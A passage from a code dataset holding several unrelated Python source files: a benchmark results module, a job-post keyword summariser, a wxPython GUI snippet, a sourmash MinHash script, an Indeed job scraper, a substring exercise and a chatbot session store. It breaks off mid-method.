def dtypes(self) -> Sequence[Type[Union[int,float,bool,object]]]:\n\n flats = self._rows_flat\n packs = self._rows_pack\n\n columns_packed = [ any([ col in packs[key] for key in self.keys]) for col in self.columns ]\n columns_values = [ [flats[key].get(col, packs[key].get(col, self._default(col))) for key in self.keys] for col in self.columns ]\n\n return [ self._infer_type(column_packed, column_values) for column_packed, column_values in zip(columns_packed,columns_values)]\n\n def window(self, partition_by:Sequence[str], order_by:Sequence[str], window_lim:Tuple[float,float], functions: Dict[str,Callable]):\n partitions = collections.defaultdict(list)\n\n for key in self.keys:\n flat = self._rows_flat[key]\n part_key = tuple([flat[part_by] for part_by in partition_by])\n partitions[part_key].append(flat)\n\n def aggregate(self, group_by:Sequence[str], functions:Dict[str,Callable]):\n pass\n\n def filter(self, pred:Callable[[Dict[str,Any]],bool] = None, **kwargs) -> 'Table':\n\n def satisfies_all_filters(key):\n row = self[key]\n\n if pred is not None and not pred(row):\n return False\n\n for col,value in kwargs.items():\n if isinstance(value,Container) and not isinstance(value,str) and row[col] not in value:\n return False\n if isinstance(value,Number) and not re.search(f'(\\D|^){value}(\\D|$)', str(row[col])):\n return False \n if isinstance(value,str) and not re.search(value, row[col]):\n return False\n if callable(value) and not value(row[col]):\n return False\n\n return True\n\n new_result = copy(self)\n new_result._rows_keys = list(filter(satisfies_all_filters,self.keys))\n\n return new_result\n\n def to_pandas(self) -> Any:\n PackageChecker.pandas(\"Table.to_pandas\")\n import pandas as pd #type: ignore\n import numpy as np #type: ignore #pandas installs numpy so if we have pandas we have numpy\n\n col_numpy = { col: np.empty(len(self), dtype=dtype) for col,dtype in zip(self.columns,self.dtypes)}\n\n row_index = 0\n\n for key in self.keys:\n\n flat = self._rows_flat[key]\n pack = self._rows_pack[key]\n\n pack_size = 1 if not pack else len(pack['index'])\n\n for col in self.columns:\n if col in pack:\n val = pack[col]\n\n elif col in flat:\n if isinstance(flat[col], (tuple,list)):\n val = [flat[col]]\n else:\n val = flat[col]\n\n else:\n val = self._default(col)\n \n col_numpy[col][row_index:(row_index+pack_size)] = val\n\n row_index += pack_size\n\n return pd.DataFrame(col_numpy, columns=self.columns)\n\n def to_tuples(self) -> Sequence[Tuple[Any,...]]:\n\n tooples = []\n\n for key in self.keys:\n \n flat = self._rows_flat[key]\n pack = self._rows_pack[key]\n\n if not pack:\n tooples.append(tuple(flat.get(col,self._default(col)) for col in self.columns))\n else:\n tooples.extend(zip(*[pack.get(col,repeat(flat.get(col,self._default(col)))) for col in self.columns]))\n\n return tooples\n\n def _default(self, column:str) -> Any:\n return [1] if column == \"index\" else float('nan')\n\n def _infer_type(self, is_packed: bool, values: Sequence[Any]) -> Type[Union[int,float,bool,object]]:\n\n types: List[Optional[Type[Any]]] = []\n\n to_type = lambda value: None if value is None else type(value)\n\n for value in values:\n if is_packed and isinstance(value, (list,tuple)):\n types.extend([to_type(v) for v in value])\n else:\n types.append(to_type(value))\n \n return self._resolve_types(types)\n\n def _resolve_types(self, types: Sequence[Optional[Type[Any]]]) -> Type[Union[int,float,bool,object]]:\n types = list(set(types))\n\n if len(types) == 1 and types[0] in [dict,str]:\n return object\n 
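# A homogeneous numeric column keeps its exact type; a None/int/float mix widens to float, and anything else falls back to object.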
\n if len(types) == 1 and types[0] in [int,float,bool]:\n return types[0]\n\n if all(t in [None,int,float] for t in types):\n return float\n\n return object\n\n def __iter__(self) -> Iterator[Dict[str,Any]]:\n for key in self.keys:\n yield self[key]\n\n def __contains__(self, key: Union[Hashable, Sequence[Hashable]]) -> bool:\n return key in self.keys\n\n def __str__(self) -> str:\n return str({\"Table\": self.name, \"Columns\": self.columns, \"Rows\": len(self)})\n\n def __len__(self) -> int:\n return sum([ len(self._rows_pack[key].get('index',[None])) for key in self.keys ])\n\n def __getitem__(self, key: Union[Hashable, Sequence[Hashable]]) -> Dict[str,Any]:\n if key not in self.keys: raise KeyError(key)\n return dict(**self._rows_flat[key], **self._rows_pack[key])\n\nclass InteractionsTable(Table):\n\n def to_progressive_list(self, span: int = None, each:bool=False):\n #Learner, Simulation, Index\n #Learner, Index\n\n lrn_sim_rows = []\n\n for interactions in self:\n \n rewards = interactions[\"reward\"]\n\n if span is None or span >= len(rewards):\n cumwindow = list(accumulate(rewards))\n cumdivisor = list(range(1,len(cumwindow)+1))\n \n elif span == 1:\n cumwindow = list(rewards)\n cumdivisor = [1]*len(cumwindow)\n\n else:\n alpha = 2/(1+span)\n cumwindow = list(accumulate(rewards , lambda a,c: c + (1-alpha)*a))\n cumdivisor = list(accumulate([1.]*len(rewards), lambda a,c: c + (1-alpha)*a)) #type: ignore\n\n lrn_sim_rows.append([interactions[\"learner_id\"], interactions[\"simulation_id\"], *list(map(truediv, cumwindow, cumdivisor))])\n\n if each:\n return lrn_sim_rows\n \n else:\n grouped_lrn_sim_rows = collections.defaultdict(list)\n \n for row in lrn_sim_rows:\n grouped_lrn_sim_rows[row[0]].append(row[2:])\n\n lrn_rows = []\n\n for learner_id in grouped_lrn_sim_rows.keys():\n\n Z = list(zip(*grouped_lrn_sim_rows[learner_id]))\n \n if not Z: continue\n\n Y = [ sum(z)/len(z) for z in Z ]\n\n lrn_rows.append([learner_id, *Y])\n\n return lrn_rows\n\n def to_progressive_pandas(self, span: int = None, each:bool=False):\n PackageChecker.pandas(\"Result.to_pandas\")\n\n import pandas as pd\n\n data = self.to_progressive_list(span, each)\n \n if each:\n n_index = len(data[0][2:])\n return pd.DataFrame(data, columns=[\"learner_id\", \"simulation_id\", *range(1,n_index+1)])\n \n else:\n n_index = len(data[0][1:])\n return pd.DataFrame(data, columns=[\"learner_id\", *range(1,n_index+1)])\n\nclass Result:\n \"\"\"A class representing the result of a Benchmark evaluation on a given collection of Simulations and Learners.\"\"\"\n\n @staticmethod\n def from_file(filename: str) -> 'Result':\n \"\"\"Create a Result from a transaction file.\"\"\"\n \n #Why is this here??? 
This is really confusing in practice\n #if filename is None or not Path(filename).exists(): return Result()\n\n json_encode = Cartesian(JsonEncode())\n json_decode = Cartesian(JsonDecode())\n\n Pipe.join(DiskSource(filename), [json_decode, ResultPromote(), json_encode], DiskSink(filename, 'w')).run()\n \n return Result.from_transactions(Pipe.join(DiskSource(filename), [json_decode]).read())\n\n @staticmethod\n def from_transactions(transactions: Iterable[Any]) -> 'Result':\n\n version = None\n benchmark = {}\n lrn_rows = []\n sim_rows = []\n int_rows = []\n\n for trx in transactions:\n if trx[0] == \"version\" : version = trx[1]\n if trx[0] == \"benchmark\": benchmark = trx[1]\n if trx[0] == \"S\" : sim_rows.append({**trx[2], \"simulation_id\": trx[1]})\n if trx[0] == \"L\" : lrn_rows.append({**trx[2], \"learner_id\" : trx[1]})\n if trx[0] == \"I\" : int_rows.append({**trx[2], \"simulation_id\": trx[1][0], \"learner_id\": trx[1][1]})\n\n return Result(version, benchmark, sim_rows, lrn_rows, int_rows)\n\n def __init__(self,\n version : Optional[int] = None,\n benchmark: Dict[str,Any] = {},\n sim_rows : Sequence[Dict[str,Any]] = [],\n lrn_rows : Sequence[Dict[str,Any]] = [],\n int_rows : Sequence[Dict[str,Any]] = []) -> None:\n \"\"\"Instantiate a Result class.\"\"\"\n\n self.version = version\n self.benchmark = benchmark\n\n self._simulations = Table (\"Simulations\" , ['simulation_id' ], sim_rows)\n self._learners = Table (\"Learners\" , ['learner_id' ], lrn_rows)\n self._interactions = InteractionsTable(\"Interactions\", ['simulation_id', 'learner_id'], int_rows)\n\n @property\n def learners(self) -> Table:\n \"\"\"The collection of learners evaluated by Benchmark. The easiest way to work with the \n learners is to convert them to a pandas data frame via Result.learners.to_pandas()\n \"\"\"\n return self._learners\n\n @property\n def simulations(self) -> Table:\n \"\"\"The collection of simulations used to evaluate each learner in the Benchmark. The easiest\n way to work with simulations is to convert to a dataframe via Result.simulations.to_pandas()\n \"\"\"\n return self._simulations\n\n @property\n def interactions(self) -> InteractionsTable:\n \"\"\"The collection of interactions that learners chose actions for in the Benchmark. Each interaction\n has a simulation_id and learner_id column to link them to the learners and simulations tables. 
The \n easiest way to work with interactions is to convert to a dataframe via Result.interactions.to_pandas()\n \"\"\"\n return self._interactions\n\n def _copy(self) -> 'Result':\n result = Result()\n\n result._simulations = copy(self._simulations)\n result._learners = copy(self._learners)\n result._interactions = copy(self._interactions)\n\n return result\n\n def filter_fin(self) -> 'Result':\n\n def is_complete_sim(sim_id):\n return all((sim_id, lrn_id) in self.interactions for lrn_id in self.learners.keys)\n\n new_result = copy(self)\n new_result._simulations = self.simulations.filter(simulation_id=is_complete_sim)\n new_result._interactions = self.interactions.filter(simulation_id=is_complete_sim)\n\n if len(new_result.simulations) == 0:\n CobaConfig.Logger.log(f\"No simulation was found with interaction data for every learner.\")\n\n return new_result\n\n def filter_sim(self, pred:Callable[[Dict[str,Any]],bool] = None, **kwargs) -> 'Result':\n\n new_result = copy(self)\n new_result._simulations = new_result.simulations.filter(pred, **kwargs)\n new_result._interactions = new_result.interactions.filter(simulation_id=new_result.simulations)\n\n if len(new_result.simulations) == 0:\n CobaConfig.Logger.log(f\"No simulations matched the given filter: {kwargs}.\")\n\n return new_result\n\n def filter_lrn(self, pred:Callable[[Dict[str,Any]],bool] = None, **kwargs) -> 'Result':\n new_result = copy(self)\n new_result._learners = new_result.learners.filter(pred, **kwargs)\n new_result._interactions = new_result.interactions.filter(learner_id=new_result.learners)\n\n if len(new_result.learners) == 0:\n CobaConfig.Logger.log(f\"No learners matched the given filter: {kwargs}.\")\n\n return new_result\n\n def plot_learners(self, \n xlim: Optional[Tuple[Number,Number]] = None,\n ylim: Optional[Tuple[Number,Number]] = None,\n span: int = None,\n err : Optional[str] = None,\n each: bool = False,\n ax = None) -> None:\n \"\"\"This plots the performance of multiple Learners on multiple simulations. It gives a sense of the expected \n performance for different learners across independent simulations. This plot is valuable in gaining insight \n into how various learners perform in comparison to one another. \n\n Args:\n xlim: Define the x-axis limits to plot. If `None` the x-axis limits will be inferred.\n ylim: Define the y-axis limits to plot. If `None` the y-axis limits will be inferred.\n span: In general this indicates how many previous evaluations to average together. In practice this works\n identically to ewm span value in the Pandas API. Additionally, if span equals None then all previous \n rewards are averaged together vs span = 1 where the instantaneous reward is plotted for each interaction.\n err: Determine what kind of error bars to plot (if any). Valid types are `None`, 'se', and 'sd'. If `None`\n then no bars are plotted, if 'se' the standard error is shown, and if 'sd' the standard deviation is shown.\n each: Determine whether each constituent observation used to estimate mean performance is also plotted.\n ax: Provide an optional axes that the plot will be drawn to. 
If not provided a new figure/axes is created.\n \"\"\"\n\n PackageChecker.matplotlib('Result.plot_learners')\n import matplotlib.pyplot as plt #type: ignore\n import numpy as np #type: ignore\n\n progressives: Dict[int,List[Sequence[float]]] = collections.defaultdict(list)\n\n for progressive in self.interactions.to_progressive_list(each=True):\n progressives[progressive[0]].append(progressive[2:])\n\n if not progressives:\n return\n \n show = ax is None\n\n if ax is None:\n ax = plt.figure(figsize=(10,6)).add_subplot(111) #type: ignore\n\n for learner_id in sorted(self.learners.keys, key=lambda id: self.learners[id][\"full_name\"]):\n\n color = next(ax._get_lines.prop_cycler)['color']\n\n label = self._learners[learner_id][\"full_name\"]\n Z = list(zip(*progressives[learner_id]))\n \n if not Z: continue\n\n N = [ len(z) for z in Z ]\n Y = [ sum(z)/len(z) for z in Z ]\n X = list(range(1,len(Y)+1))\n\n start = xlim[0] if xlim else int(.05*len(X))\n end = xlim[1] if xlim else len(X)\n\n if start >= end:\n CobaConfig.Logger.log(\"The plot's end is less than the start making plotting impossible.\")\n return\n\n X = X[start:end]\n Y = Y[start:end]\n Z = Z[start:end]\n\n if len(X) == 0: continue\n\n #this is much faster than python's native stdev\n #and more or less free computationally so we always\n #calculate it regardless of if they are showing them\n #we are using the identity Var[Y] = E[Y^2]-E[Y]^2\n Y2 = [ sum([zz**2 for zz in z])/len(z) for z in Z ]\n SD = [ (round(y2-y**2,8))**(1/2) for y,y2 in zip(Y,Y2) ]\n SE = [ sd/(n**(1/2)) for sd,n in zip(SD,N) ]\n\n yerr = 0 if err is None else SE if err.lower() == 'se' else SD if err.lower() == 'sd' else 0\n ax.errorbar(X, Y, yerr=yerr, elinewidth=0.5, errorevery=(0,max(int(len(X)*0.05),1)), label=label, color=color)\n\n if each:\n for Y in list(zip(*Z)):\n ax.plot(X,Y, color=color, alpha=0.15)\n\n padding = .05\n ax.margins(0)\n ax.set_xticks(np.clip(ax.get_xticks(), *ax.get_xlim()))\n ax.margins(padding)\n\n if xlim:\n x_pad = padding*(xlim[1]-xlim[0])\n ax.set_xlim(xlim[0]-x_pad, xlim[1]+x_pad)\n\n if ylim:\n y_pad = padding*(ylim[1]-ylim[0])\n ax.set_ylim(ylim[0]-y_pad, ylim[1]+y_pad)\n\n ax.set_title((\"Instantaneous\" if span == 1 else \"Progressive\" if span is None else f\"Span {span}\") + \" Reward\", loc='left',pad=15)\n ax.set_ylabel(\"Reward\")\n ax.set_xlabel(\"Interactions\")\n\n if ax.get_legend() is None:\n scale = 0.65\n box1 = ax.get_position()\n ax.set_position([box1.x0, box1.y0 + box1.height * (1-scale), box1.width, box1.height * scale])\n else:\n ax.get_legend().remove()\n\n ax.legend(*ax.get_legend_handles_labels(), loc='upper left', bbox_to_anchor=(-.01, -.25), ncol=1, fontsize='medium') #type: ignore\n\n if show:\n plt.show()\n\n def __str__(self) -> str:\n return str({ \"Learners\": len(self._learners), \"Simulations\": len(self._simulations), \"Interactions\": len(self._interactions) })\n\n def __repr__(self) -> str:\n return str(self)\n\nclass ResultPromote(Filter):\n\n CurrentVersion = 3\n\n def filter(self, items: Iterable[Any]) -> Iterable[Any]:\n items_iter = iter(items)\n items_peek = next(items_iter)\n items_iter = chain([items_peek], items_iter)\n\n version = 0 if items_peek[0] != 'version' else items_peek[1]\n\n if version == ResultPromote.CurrentVersion:\n raise StopPipe()\n\n while version != ResultPromote.CurrentVersion:\n if version == 0:\n promoted_items = [[\"version\",1]]\n\n for transaction in items:\n\n if transaction[0] == \"L\":\n\n index = transaction[1][1]['learner_id']\n values = 
transaction[1][1]\n\n                        del values['learner_id']\n\n                        promoted_items.append([transaction[0], index, values])\n\n                    if transaction[0] == \"S\":\n\n                        index = transaction[1][1]['simulation_id']\n                        values = transaction[1][1]\n\n                        del values['simulation_id']\n\n                        promoted_items.append([transaction[0], index, values])\n\n                    if transaction[0] == \"B\":\n                        key_columns = ['learner_id', 'simulation_id', 'seed', 'batch_index']\n                        \n                        index = [ transaction[1][1][k] for k in key_columns ]\n                        values = transaction[1][1]\n                        \n                        for key_column in key_columns: del values[key_column]\n                        \n                        if 'reward' in values:\n                            values['reward'] = values['reward'].estimate\n                        \n                        if 'mean_reward' in values:\n                            values['reward'] = values['mean_reward'].estimate\n                            del values['mean_reward']\n\n                        values['reward'] = round(values['reward'], 5)\n\n                        promoted_items.append([transaction[0], index, values])\n\n                items = promoted_items\n                version = 1\n\n            if version == 1:\n\n                n_seeds       : Optional[int]                  = None\n                S_transactions: Dict[int, Any]                 = {}\n                S_seeds       : Dict[int, List[Optional[int]]] = collections.defaultdict(list)\n\n                B_rows: Dict[Tuple[int,int], Dict[str, List[float]] ] = {}\n                B_cnts: Dict[int, int                                ] = {}\n\n                promoted_items = [[\"version\",2]]\n\n                for transaction in items:\n\n                    if transaction[0] == \"benchmark\":\n                        n_seeds = transaction[1].get('n_seeds', None)\n\n                        del transaction[1]['n_seeds']\n                        del transaction[1]['batcher']\n                        del transaction[1]['ignore_first']\n\n                        promoted_items.append(transaction)\n\n                    if transaction[0] == \"L\":\n                        promoted_items.append(transaction)\n\n                    if transaction[0] == \"S\":\n                        S_transactions[transaction[1]] = transaction\n\n                    if transaction[0] == \"B\":\n                        S_id = transaction[1][1]\n                        seed = transaction[1][2]\n                        L_id = transaction[1][0]\n                        B_id = transaction[1][3]\n                        \n                        if n_seeds is None:\n                            raise StopPipe(\"We are unable to promote logs from version 1 to version 2\")\n\n                        if seed not in S_seeds[S_id]:\n                            S_seeds[S_id].append(seed)\n                        \n                        new_S_id = n_seeds * S_id + S_seeds[S_id].index(seed)\n                        new_dict = S_transactions[S_id][2].copy()\n                        \n                        new_dict[\"source\"]  = str(S_id)\n                        new_dict[\"filters\"] = f'[{{\"Shuffle\":{seed}}}]'\n\n                        B_cnts[S_id] = new_dict['batch_count']\n\n                        promoted_items.append([\"S\", new_S_id, new_dict])\n\n                        if B_id == 0: B_rows[(S_id, L_id)] = {\"N\":[], \"reward\":[]}\n\n                        B_rows[(S_id, L_id)][\"N\"     ].append(transaction[2][\"N\"])\n                        B_rows[(S_id, L_id)][\"reward\"].append(transaction[2][\"reward\"])\n\n                        if len(B_rows[(S_id, L_id)][\"N\"]) == B_cnts[S_id]:\n                            promoted_items.append([\"B\", [S_id, L_id], B_rows[(S_id, L_id)]])\n                            del B_rows[(S_id, L_id)]\n\n                items = promoted_items\n                version = 2\n\n            if version == 2:\n\n                promoted_items = [[\"version\",3]]\n\n                for transaction in items:\n                    \n                    #upgrade all reward entries to the packed format which will now allow array types and dict types.\n                    if transaction[0] == \"B\":\n                        rewards = transaction[2][\"reward\"]\n                        del transaction[2][\"reward\"]\n                        transaction[2][\"_packed\"] = {\"reward\": rewards}\n                    \n                    #Change from B to I to be consistent with result property name: `interactions`\n                    if transaction[0] == \"B\": \n                        transaction[0] = \"I\"\n                    \n                    promoted_items.append(transaction)\n\n                items = promoted_items\n                version = 3\n\n        return items\n","sub_path":"coba/benchmarks/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":25454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"156057207","text":"#coding=utf8\n\nimport html2text\nimport re\nimport json\nfrom collections import defaultdict\nfrom nlp_utils import 
lemmatized_tokens, get_unigrams, get_bigrams\nfrom utils import *\nfrom tfidf import tfidf, idf\n\n\ndef load_preprocess_data(input_file):\n    job_posts = []\n\n    with open(input_file) as f:\n        for j_text in f.read().strip().split('\\n'):\n            j = json.loads(j_text)\n            job_posts.append(j)\n\n    for j in job_posts:\n        j['headers'] = []\n        j['feature_sentence'] = defaultdict(list)\n        header = ''\n        description_text = html2text.html2text(j['description'])\n        for sentence in description_text.split('\\n'):\n            if re.search(r'\\A\\*\\*\\b[a-zA-Z]+\\b', sentence):\n                header = sentence\n                j['headers'].append(header)\n            if sentence.strip().startswith('* ') or sentence.strip().startswith(u'· '):\n                j['feature_sentence'][header].append(sentence)\n    return job_posts\n\n\ndef build_tfidf_model(job_posts, nlp_module='stanford'):\n    tokens_list = []\n    total_tokens = []\n    idf_map = {}\n\n    for j in job_posts:\n        j['tokens'] = []\n        for header, sentences in j['feature_sentence'].items():\n            for sent in sentences:\n                sent = clean_sentence(sent)\n                tokens = []\n                if not sent:\n                    continue\n                word_list = lemmatized_tokens(sent, nlp_module)\n                unigram_tokens = get_unigrams(word_list)\n                tokens.extend(unigram_tokens)\n                bigram_tokens = get_bigrams(word_list)\n                tokens.extend(bigram_tokens)\n                j['tokens'].extend(tokens)\n        tokens_list.append(j['tokens'])\n        total_tokens.extend(j['tokens'])\n\n    unique_tokens = list(set(total_tokens))\n    for token in unique_tokens:\n        idf_map[token] = idf(token, tokens_list)\n    return idf_map\n\n\ndef evaluate_keywords(job_posts, evaluated_idf, selection=0.1):\n    for j in job_posts:\n        tfidfs = {}\n        for token in j['tokens']:\n            if token in tfidfs:\n                continue\n            tfidfs[token] = tfidf(token, j['tokens'], evaluated_idf)\n        sorted_tfidfs = sorted(tfidfs.items(), key=lambda x: -x[1])\n        top_count = int(round(len(sorted_tfidfs)*selection))\n        keywords = [i[0] for i in sorted_tfidfs[:top_count]]\n        j['keywords'] = keywords\n\n\ndef evaluate_summary(job_posts):\n    for j in job_posts:\n        summary = []\n\n        for header in j['headers']:\n            summary.append(header)\n            if header in j['feature_sentence']:\n                filtered = filter_sentences(j['feature_sentence'][header], j['keywords'])\n                summary.extend(filtered)\n        j['summary'] = '\\n'.join(summary)\n\n\ndef dump_processed_data(job_posts, output_file):\n    for j in job_posts:\n        del j['headers']\n        del j['tokens']\n        del j['feature_sentence']\n\n    with open(output_file, 'w') as f:\n        for j in job_posts:\n            j_text = json.dumps(j)\n            f.write(j_text)\n            f.write('\\n')\n\n","sub_path":"snippet_generation/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"516379971","text":"# -*- coding: utf-8 -*-\n\nimport wx\nimport numpy\nimport matplotlib.pyplot as plt\nimport xlrd\n\ndef name(workbook):\n\tsheet2=workbook.sheet_by_index(1)\n\trow_0=sheet2.row_values(0)\n\treturn row_0\n\ndef EvtComboBox(evt):\n    cb = evt.GetEventObject()\n\ndef OnOpen(evt):\n    # load the workbook named in the text field and fill the combo box with its sheet-2 header row\n    workbook = xlrd.open_workbook(filename.GetValue())\n    cb.SetItems(name(workbook))\n\napp=wx.App()\nwin=wx.Frame(None,title=\"Simple Editor\",size=(410,100))\nbkg=wx.Panel(win)\n\nfilename=wx.TextCtrl(bkg)\nfile_name=wx.StaticText(bkg,-1,\"TestFile \")\n\nopenButton=wx.Button(bkg, label='open')\nopenButton.Bind(wx.EVT_BUTTON, OnOpen)\n\ncb = wx.ComboBox(bkg, 500, \"default value\", (90, 50), \n                 (160, -1), [],\n                 wx.CB_DROPDOWN\n                 #| wx.TE_PROCESS_ENTER\n                 #| wx.CB_SORT\n                 )\n\n
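# EvtComboBox runs whenever the user picks an entry; here it only grabs the combo box\n# from the event object, a placeholder for real selection handling\n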
bkg.Bind(wx.EVT_COMBOBOX, EvtComboBox, cb)\n\n\n\nhbox=wx.BoxSizer()\nhbox.Add(cb,proportion=0,flag=wx.LEFT)\nhbox.Add(file_name,proportion=0,flag=wx.LEFT)\nhbox.Add(filename,proportion=1,flag=wx.LEFT)\n\nvbox=wx.BoxSizer(wx.VERTICAL)\nvbox.Add(hbox,proportion=0,flag=wx.EXPAND | wx.ALL, border=5)\nbkg.SetSizer(vbox)\n\nwin.Show()\n\napp.MainLoop()","sub_path":"wx_choice_02.py","file_name":"wx_choice_02.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"410198183","text":"#! /usr/bin/env python\n\"\"\"\nUse the MurmurHash library mmh3 and separate Python code to calculate\na MinHash signature for input protein sequence, as a way to do an\nexternal check on our C++ implementation.\n\nThe output of this is used in test_sourmash.py to verify our C++ code.\n\"\"\"\n\ndna_to_aa={'TTT':'F','TTC':'F', 'TTA':'L','TTG':'L',\n           'TCT':'S','TCC':'S','TCA':'S','TCG':'S',\n           'TAT':'Y','TAC':'Y', 'TAA':'*','TAG':'*','TGA':'*',\n           'TGT':'C','TGC':'C', 'TGG':'W',\n           'CTT':'L','CTC':'L','CTA':'L','CTG':'L',\n           'CCT':'P','CCC':'P','CCA':'P','CCG':'P',\n           'CAT':'H','CAC':'H', 'CAA':'Q','CAG':'Q',\n           'CGT':'R','CGC':'R','CGA':'R','CGG':'R',\n           'ATT':'I','ATC':'I','ATA':'I', 'ATG':'M',\n           'ACT':'T','ACC':'T','ACA':'T','ACG':'T',\n           'AAT':'N','AAC':'N', 'AAA':'K','AAG':'K',\n           'AGT':'S','AGC':'S', 'AGA':'R','AGG':'R',\n           'GTT':'V','GTC':'V','GTA':'V','GTG':'V',\n           'GCT':'A','GCC':'A','GCA':'A','GCG':'A',\n           'GAT':'D','GAC':'D', 'GAA':'E','GAG':'E',\n           'GGT':'G','GGC':'G','GGA':'G','GGG':'G'}\n\n\n__complementTranslation = { \"A\": \"T\", \"C\": \"G\", \"G\": \"C\", \"T\": \"A\", \"N\": \"N\" }\ndef complement(s):\n    \"\"\"\n    Return complement of 's'.\n    \"\"\"\n    c = \"\".join(__complementTranslation[n] for n in s)\n    return c\n\n\ndef reverse(s):\n    \"\"\"\n    Return reverse of 's'.\n    \"\"\"\n    r = \"\".join(reversed(s))\n    return r\n\n\ndef peptides(seq, start):\n    for i in range(start, len(seq), 3):\n        yield dna_to_aa.get(seq[i:i+3], \"X\")\n\n\ndef translate(seq):\n    for i in range(3):\n        pep = peptides(seq, i)\n        yield \"\".join(pep)\n\n    revcomp = reverse(complement(seq))\n    for i in range(3):\n        pep = peptides(revcomp, i)\n        yield \"\".join(pep)\n\ndef kmers(seq, k):\n    for start in range(len(seq) - k + 1):\n        yield seq[start:start + k]\n\n###\n\nK = 21\n\nimport sys, screed\nimport mmh3\nimport sourmash\nprint('imported sourmash:', sourmash, file=sys.stderr)\nimport sourmash.signature\n\nrecord = next(iter(screed.open(sys.argv[1])))\nprint('loaded', record.name, file=sys.stderr)\n\nmh = sourmash.MinHash(ksize=K, n=500, is_protein=True)\nprot_ksize = int(K / 3)\n\nfor kmer in kmers(record.sequence, prot_ksize):\n    hash_val = mmh3.hash64(kmer, seed=42)[0]\n\n    # convert to unsigned int if negative\n    if hash_val < 0:\n        hash_val += 2**64\n\n    mh.add_hash(hash_val)\n\ns = sourmash.signature.SourmashSignature('', mh, name=record.name)\nprint(sourmash.signature.save_signatures([s]))\n","sub_path":"utils/compute-input-prot-another-way.py","file_name":"compute-input-prot-another-way.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"488451098","text":"import requests\nfrom bs4 import BeautifulSoup\n\nLIMIT = 50\nURL = f\"http://indeed.com/jobs?q=python&limit={LIMIT}\"\n\n\ndef get_last_page():\n    result = requests.get(URL)\n    soup = BeautifulSoup(result.text, \"html.parser\")\n    pagination = soup.find(\"div\", {\"class\": \"pagination\"})\n    links = pagination.find_all(\"a\")\n    pages = []\n
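    # the last anchor in the pagination widget is the \"Next\" control, not a page number,\n    # so it is skipped below (this assumes Indeed's markup at the time the scraper was written)\n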
    for link in links[:-1]:\n        pages.append(int(link.string))\n\n    last_page = pages[-1]\n    return last_page\n\n\ndef extract_job(soup):\n    job_title = soup.find(\"h2\", {\"class\": \"jobTitle\"})\n    title = job_title.find(\"span\").string\n    if title == \"new\":\n        title = job_title.find_all(\"span\")[1].string\n    company = soup.find(\"span\", {\"class\": \"companyName\"}).string\n    location = soup.find(\"div\", {\"class\": \"companyLocation\"}).text\n    job_id = soup[\"data-jk\"]\n\n    return {\n        \"title\": title,\n        \"company\": company,\n        \"location\": location,\n        \"apply_link\": f\"https://www.indeed.com/viewjob?jk={job_id}\"}\n\n\ndef extract_jobs(last_pages):\n    jobs = []\n    for page in range(last_pages):\n        print(f\"Scraping Indeed page {page}\")\n        result = requests.get(f\"{URL}&start={page*LIMIT}\")\n        soup = BeautifulSoup(result.text, \"html.parser\")\n        results = soup.find_all(\"a\", {\"class\": \"resultWithShelf\"})\n        for result in results:\n            job = extract_job(result)\n            jobs.append(job)\n\n    return jobs\n\n\ndef get_jobs():\n    last_page = get_last_page()\n    jobs = extract_jobs(last_page)\n    return jobs\n","sub_path":"indeed.py","file_name":"indeed.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"69038915","text":"\"\"\"\nTitle : Find a String\nSubdomain : Challenges/Strings\nDomain : Python\nAuthor : Sai Ram Adidela\nCreated : 20 April 2018\n\"\"\"\n\n\ndef count_substring(s, sub_s):\n    no = 0\n    for i in range(len(s)):\n        if s[i:].startswith(sub_s):\n            no += 1\n    return no\n\n\nif __name__ == '__main__':\n    string = input().strip()\n    sub_string = input().strip()\n\n    count = count_substring(string, sub_string)\n    print(count)\n","sub_path":"challenges/strings/find_string.py","file_name":"find_string.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"638397085","text":"# -*- coding: utf-8 -*-\nimport json\nimport sqlite3\nimport config\nimport datetime\nfrom vedis import Vedis\n\n\ndef set_state(user_id, value):\n    with Vedis(config.db_file) as db:\n        try:\n            db[user_id] = value\n            return True\n        except KeyError:\n            # ideally this situation should be handled somehow\n            return False\n\n\ndef get_current_state(user_id):\n    with Vedis(config.db_file) as db:\n        try:\n            print('{} with {}'.format(user_id, db[user_id]))\n            return db[user_id]\n        except KeyError:\n            return config.States.S_START.value  # default value - the start of the dialog\n\n\nclass SessionDb:\n\n    def create_session_with_source(self, user_id, source):\n        value = {\n            'source': source,\n            'destination': '',\n            'last_date': '',\n            'type': '',\n            'dr_source': '',\n            'dr_destination': '',\n        }\n\n        value = json.dumps(value)\n        with Vedis(config.session_file) as db:\n            try:\n                db[user_id] = value\n                return True\n            except KeyError:\n                # ideally this situation should be handled somehow\n                return False\n\n    def get_session(self, user_id):\n        with Vedis(config.session_file) as db:\n            try:\n                # print('{} with {}'.format(user_id, db[user_id]))\n                value = json.loads(db[user_id])\n                return value\n            except KeyError:\n                return 'no session for this user'\n\n    def update_session(self, user_id, source=None, destination=None, last_date=None, type=None,\n                       dr_source=None, dr_destination=None):\n        with Vedis(config.session_file) as db:\n            try:\n                print('{} with {}'.format(user_id, db[user_id]))\n                value = db[user_id]\n                value = json.loads(value)\n
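                # apply every argument that is not None; independent ifs let a single call\n                # update several session fields at once\n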
